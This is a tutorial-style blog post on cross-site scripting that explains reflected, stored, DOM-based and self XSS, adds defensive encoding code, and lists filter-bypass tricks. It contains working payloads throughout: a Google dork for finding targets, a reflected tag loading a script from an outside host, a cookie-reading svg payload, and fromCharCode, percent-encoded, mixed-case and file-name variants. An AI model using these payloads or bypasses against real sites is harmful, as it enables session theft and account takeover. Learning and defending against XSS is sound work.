What is XSS and How to bypass filters? | Hackers Creed - Hackers Creed | Legends Of Hacking , Tricks And Tips , Earn Money Online

Thursday, 18 January 2018


What is XSS (Cross-Site Scripting)? How to bypass filters?


Hello guys, this is Yeasir Arafat. I am an independent security researcher from Bangladesh. A few beginners asked me to write a note about what XSS (cross-site scripting) is and how it works. I hope this write-up will be helpful for them. Today I will cover:
1. What is XSS?
2. Types of XSS
3. How to bypass filters?

1.What is XSS?

Cross-Site Scripting, also known as XSS, is one of the most common web application vulnerabilities. It allows an attacker to run client-side scripts (usually JavaScript) in web pages viewed by other users. In a typical XSS attack the attacker injects malicious JavaScript into a legitimate website. Because the injected script runs inside the site's own origin, the browser's same-origin policy, which normally keeps one site's data away from another, does not protect the site from it: the script can read the victim's cookies and page content and perform actions as the victim. Vulnerabilities of this kind can lead to large-scale attacks.


Finding vulnerable websites:
XSS can be anywhere. Since XSS is a web application vulnerability, you can find candidate sites with a Google dork (e.g. inurl:.com/search.asp) and then test each input that is reflected in the response by injecting a probe payload such as:
"><img src=x onerror=prompt('xss-by-nu11_54!n7')>

Start with the basics of XSS. You can practise on DVWA or bWAPP, which are deliberately vulnerable applications and are good for understanding how XSS works.


2. Types of XSS:

1. Self XSS
2. Reflected XSS
3. Stored XSS
4. DOM-based (client-side) XSS

Self XSS:
Self-XSS is a form of XSS that relies on social engineering to trick the victim into running malicious JavaScript in their own browser, typically by pasting it into the developer console or the address bar. Any site can be "self-XSSed" in this sense, because the console lets a user run arbitrary JavaScript in the page. It is not a true XSS vulnerability, because it depends on tricking the user into executing code rather than on a flaw in the affected website, and bug bounty programs usually treat it as out of scope.
You can pop up a window yourself from the developer console of your browser (Chrome, Firefox).



Reflected XSS:

Reflected cross-site scripting, also known as non-persistent XSS, occurs when a malicious script is reflected off a web application into the victim's browser. The application takes one or more parameters as input and echoes them back, unencoded, into the page it generates.
This is a serious concern, as it lets an attacker have client-side JavaScript of his choice rendered and executed by the browser of the victim viewing the page. It gets worse when the session or other essential cookies of the user can be stolen through the document.cookie property of JavaScript. (Cookies set with the HttpOnly flag are not exposed to document.cookie, but the script can still act as the user from inside the page.)
Consider the following JavaScript code:

<a href="javascript:alert('myxssruns')">Click Me</a>

When this payload is rendered and the victim clicks the Click Me link, the JavaScript in the href executes in the context of the affected page, and the victim's session is compromised.
or something like this:

http://forum.com/?q=news<SCRIPT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

If a victim follows this URL, the forum's search page reflects the injected script tag back into their browser, which loads and runs the attacker's script, enabling the attacker to steal their session cookies and hijack their forum account.

Stored XSS:
The most damaging type of XSS is stored XSS, also known as persistent XSS. It differs from reflected XSS in that the payload is saved by the application (in a database record, a comment, a profile field) and served to every user who later views the affected page, so it executes without the victim having to click a crafted link.
Comment boxes on blogs and forum posts are the most common places to find stored XSS.

When a user navigates to the affected page, the payload injected by the attacker is served as part of the page, so the user inadvertently executes the malicious script just by viewing it in a browser.
An attacker adds the following comment:

"><svg/onload=prompt(document.cookie)>

From then on, every time the page is visited by any user, the svg tag in the comment fires its onload handler. Here it only shows the visitor's cookies in a prompt, but the same handler could load a script hosted on the attacker's site and send the visitor's session cookies to the attacker. With those session cookies the attacker can compromise the visitor's account and gain access to the personal information and payment data stored in it.
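The reflected and stored cases above share one root cause and one fix: untrusted text is concatenated into HTML, and the fix is to HTML-encode it for the context it lands in. The following is an added example, not code from the original article, showing a minimal server-side template for both cases (a search page that reflects a query, and a comment list rendered from storage) in its vulnerable and hardened forms. The function names, page layout and sample comment store are assumptions made for this example; the two payloads are the ones from the article.

```javascript
// Added example, not code from the original article. Function names, the
// page layout and the sample comment store are assumptions for this demo.

// Payloads taken from the article's own reflected and stored examples.
const REFLECTED_PAYLOAD = 'news<SCRIPT SRC="http://ha.ckers.org/xss.js"></SCRIPT>';
const STORED_PAYLOAD = '"><svg/onload=prompt(document.cookie)>';

// Constructed sample data: a comment store holding one attacker comment.
const comments = ['Nice post!', STORED_PAYLOAD];

// Vulnerable: untrusted input is concatenated straight into HTML, so the
// attacker's < and " are parsed as markup instead of displayed as text.
function renderSearchVulnerable(q) {
  return `<h1>Results for: ${q}</h1>`;
}

function renderCommentsVulnerable(list) {
  // Same value used in an attribute context (title) and a text context.
  return list
    .map((c) => `<div class="comment" title="${c}">${c}</div>`)
    .join('\n');
}

// Fix: HTML-encode the value. "&" first, then the characters that can
// terminate text content or a quoted attribute value.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

function renderSearchSafe(q) {
  return `<h1>Results for: ${escapeHtml(q)}</h1>`;
}

function renderCommentsSafe(list) {
  return list
    .map((c) => `<div class="comment" title="${escapeHtml(c)}">${escapeHtml(c)}</div>`)
    .join('\n');
}

// Rough check for the demo: count tag openers in the output. Any tag beyond
// the ones the template itself wrote was smuggled in by user input.
function countTags(html) {
  return (html.match(/<[a-zA-Z/]/g) || []).length;
}

console.log(renderSearchVulnerable(REFLECTED_PAYLOAD)); // live <SCRIPT> tag
console.log(renderSearchSafe(REFLECTED_PAYLOAD));       // shown as text
console.log(renderCommentsVulnerable(comments));        // two live <svg> tags
console.log(renderCommentsSafe(comments));              // none
```

Note that the encoding is done at output time, per context: the same comment is encoded once for the attribute and once for the text node. Encoding on input instead breaks legitimate data and misses values that reach the page from other sources.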

DOM-based XSS:
DOM-based XSS arises when a client-side script in the application's response reads data from an attacker-controllable part of the DOM and passes it to a sink that executes it as HTML or JavaScript. The mechanism differs from the other types, but the impact is the same: attacker-supplied code can perform a wide range of actions, such as stealing the victim's session token or login credentials.

An interesting property of this vulnerability: DOM-based XSS is performed entirely on the client side, and when the payload is carried in the URL fragment (the part after #) it is never sent to the server at all. This makes it much harder to detect for web application firewalls and for security engineers analysing server logs, since they never see the attack.
Some objects in particular can be attacker-controlled and act as sources: the URL (document.URL, location.search), the part of the URL after the hash (location.hash) and the referrer (document.referrer).

Let us consider the following piece of code to better understand DOM-based XSS:
<html>
<head>
<title>DOM-based XSS</title>
</head>
<body>
<script>
// Source: everything after the "#" in the URL is under the visitor's (or an attacker's) control.
name = location.hash.substring(1);
// Sink: document.write() parses the string as HTML, so a fragment such as
// #<img src=x onerror=alert(1)> is rendered as markup and its handler runs.
document.write("<b>Hey "+unescape(name)+"! XSS by nu11_54!n7 </b>");
</script>
</body>
</html>

Note: this code takes its input from location.hash and uses it to build a message with document.write(), which parses the string as HTML. Other common sinks that cause DOM-based XSS are innerHTML, outerHTML, insertAdjacentHTML(), eval(), setTimeout() and setInterval() with a string argument, and jQuery's $() and .html(). A safe version of this page would create the element and assign the name with textContent, which never parses its input as HTML.


3. XSS filter bypass techniques:

Maybe you have heard about XSS filter bypasses. Sometimes you inject a payload into your target and get nothing, meaning no pop-up or alert window appears, and you conclude the site is not vulnerable to XSS. Often, though, the input is reflected but a filter or web application firewall strips or blocks the obvious payloads, and a small change to the payload gets through. I used the following ways to bypass such filters:
1. Bypassing magic_quotes_gpc
2. Converting the payload to character codes (String.fromCharCode)
3. Hex (percent) encoding
4. Bypassing with obfuscation: <ScRipt>alert("hi");</sCRipT>
5. Closing tags: "/> "> </>
6. XSS payloads in image file names

1. Bypassing magic_quotes_gpc:

magic_quotes_gpc=On is a PHP setting (configured in php.ini) that automatically escapes every ' (single quote), " (double quote), \ (backslash) and NUL byte in GET, POST and cookie data with a backslash, the same as running addslashes() on the input.
For example:
<script>alert("xss-by-Yeasir");</script> arrives in the application as <script>alert(\"xss-by-Yeasir\");</script>, so the quotes are broken and the script won't run.
Note: magic quotes were deprecated in PHP 5.3 and removed in PHP 5.4, so this setting only matters on very old hosts, but the same bypass works against any filter that escapes or strips quotes.

2. Converting it into character codes:

Since the filter only interferes with quotes, we can bypass it by building the string with String.fromCharCode() instead of a quoted literal.
For example, alert("xss-by-Yeasir"); can be written as the character codes
String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 120, 115, 115, 45, 98, 121, 45, 89, 101, 97, 115, 105, 114, 34, 41, 59)
String.fromCharCode() returns a string, not code, so it has to be passed to eval() to run. The script becomes <script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 120, 115, 115, 45, 98, 121, 45, 89, 101, 97, 115, 105, 114, 34, 41, 59))</script>. This payload contains no " or ' or backslash, so a quote-escaping filter leaves it untouched and the script runs.

3. Hex (percent) encoding:

We can percent-encode the whole payload, writing every byte as %XX, so that a filter looking for literal characters such as < or " does not see them. This can be done with the HackBar add-on in Firefox or any URL encoder.
For example: "><img src=x onerror=alert('xss-by-yeasir')> encodes to:
%22%3e%3c%69%6d%67%20%73%72%63%3d%78%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%27%78%73%73%2d%62%79%2d%79%65%61%73%69%72%27%29%3e
Now you can insert this payload where you want. :)
Caveat: the web server decodes %XX sequences before the application sees the parameter, so the payload arrives unchanged. This only defeats filters or WAF rules that inspect the raw, undecoded request; it does nothing against a filter that runs after decoding.
4. Bypassing with obfuscation:
Some site admins put words such as script and alert on a restricted-word list, so whenever you submit those keywords the filter removes them or returns an error such as "you are not allowed to search this". A case-sensitive blacklist can be bypassed by changing the case of the keywords. This works for HTML tag and attribute names, which are case-insensitive; JavaScript identifiers are case-sensitive, so alert itself must keep its case (hide it with String.fromCharCode as above if it is also blacklisted).
For example:
<ScRipt>alert("Xss-by-Yeasir");</sCRipT>
Note: this technique rarely works against modern filters, but it is worth a try.
5. Closing tags:
Sometimes the input lands inside a quoted attribute value or an unclosed tag. Putting "> or "/> at the start of the payload closes the attribute and the tag you are injected into, so what follows is parsed as new markup:
"><script>alert("Xss-by-Yeasir");</script>
"/><svg onload=alert('xss-by-yeasir')>
6. Running an XSS payload from an image file name:
An image upload can carry the payload in its file name. If the application later shows the file name unencoded (in a gallery, an alt attribute or an error message), the payload fires, and upload handlers are often less strictly filtered than form fields. Rename an image so the payload is the name and .jpg is the extension:
"><img src=x onerror=alert('xss-by-yeasir')>.jpg
Here .jpg is the extension and "><img src=x onerror=alert('xss-by-yeasir')> is the name of the image.
Note: you need Linux (or another system that allows these characters) to create such a file name, because Windows does not allow ", < or > in file names.
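To see concretely which filter each of techniques 1 to 4 defeats, and which it does not, the following added example (not code from the original article) applies the transformations to the article's payload and runs every variant through two toy filters: an addslashes()-style quote escaper, which is what magic_quotes_gpc did, and a keyword blacklist in a naive and a slightly less naive form. The filters and function names are constructed for this example and model no real product's WAF.

```javascript
// Added example, not code from the original article. The filters below are
// constructed stand-ins, not any real WAF; function names are assumptions.

const PAYLOAD = 'alert("xss-by-Yeasir");';

// --- transformations from the article ---------------------------------------

// Technique 2: express the JS as String.fromCharCode(...) so the payload
// contains no quotes or backslashes. The result is a string, hence eval().
function toCharCodePayload(js) {
  const codes = Array.from(js, (ch) => ch.charCodeAt(0));
  return `eval(String.fromCharCode(${codes.join(', ')}))`;
}

// Technique 3: percent-encode every byte (the article calls this hex encoding).
function percentEncode(s) {
  return Array.from(new TextEncoder().encode(s), (b) => '%' + b.toString(16).padStart(2, '0')).join('');
}

// Technique 4: alternate letter case. Valid for HTML tag and attribute names,
// which are case-insensitive; JavaScript identifiers such as alert are not.
function mixCase(s) {
  return Array.from(s, (ch, i) => (i % 2 ? ch.toUpperCase() : ch.toLowerCase())).join('');
}

// --- toy filters --------------------------------------------------------------

// Technique 1's target: PHP magic_quotes_gpc / addslashes() behaviour.
function addslashes(s) {
  return s.replace(/([\\'"])/g, '\\$1').replace(/\0/g, '\\0');
}

// A case-sensitive keyword blacklist run on the raw request. true = blocked.
function naiveBlacklist(s) {
  return /script|alert/.test(s);
}

// The same idea done less badly: decode first, match case-insensitively and
// include the obvious indirections. Still a blacklist, still the wrong layer.
function decodedBlacklist(s) {
  let decoded = s;
  try { decoded = decodeURIComponent(s); } catch (e) { /* not percent-encoded */ }
  return /script|alert|onerror|onload|fromcharcode|eval/i.test(decoded);
}

// Record which filter each variant gets past.
function evaluate(label, variant) {
  return {
    label,
    variant,
    survivesAddslashes: addslashes(variant) === variant,
    passesNaiveBlacklist: !naiveBlacklist(variant),
    passesDecodedBlacklist: !decodedBlacklist(variant),
  };
}

function runAll() {
  return [
    evaluate('plain', PAYLOAD),
    evaluate('fromCharCode', toCharCodePayload(PAYLOAD)),
    evaluate('percent-encoded', percentEncode(PAYLOAD)),
    evaluate('mixed-case', mixCase(PAYLOAD)),
  ];
}

console.table(runAll());
```

Every variant gets past at least one of the two broken filters, and every variant is caught by the filter that decodes first and matches case-insensitively; the lesson is that keyword blacklists and quote escaping are the wrong layer. The defence that does not need a list of bad words is encoding output for the HTML or JavaScript context it is written into, with a Content Security Policy as defence in depth.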
Here is a list of XSS filter evasion cheat sheets:
Some useful resources:
Disclaimer:
This article is intended for educational purposes only. Thanks :) Special thanks to the writer of this article, Mr. Yeasir Arafat :) Thanks for this great sharing.
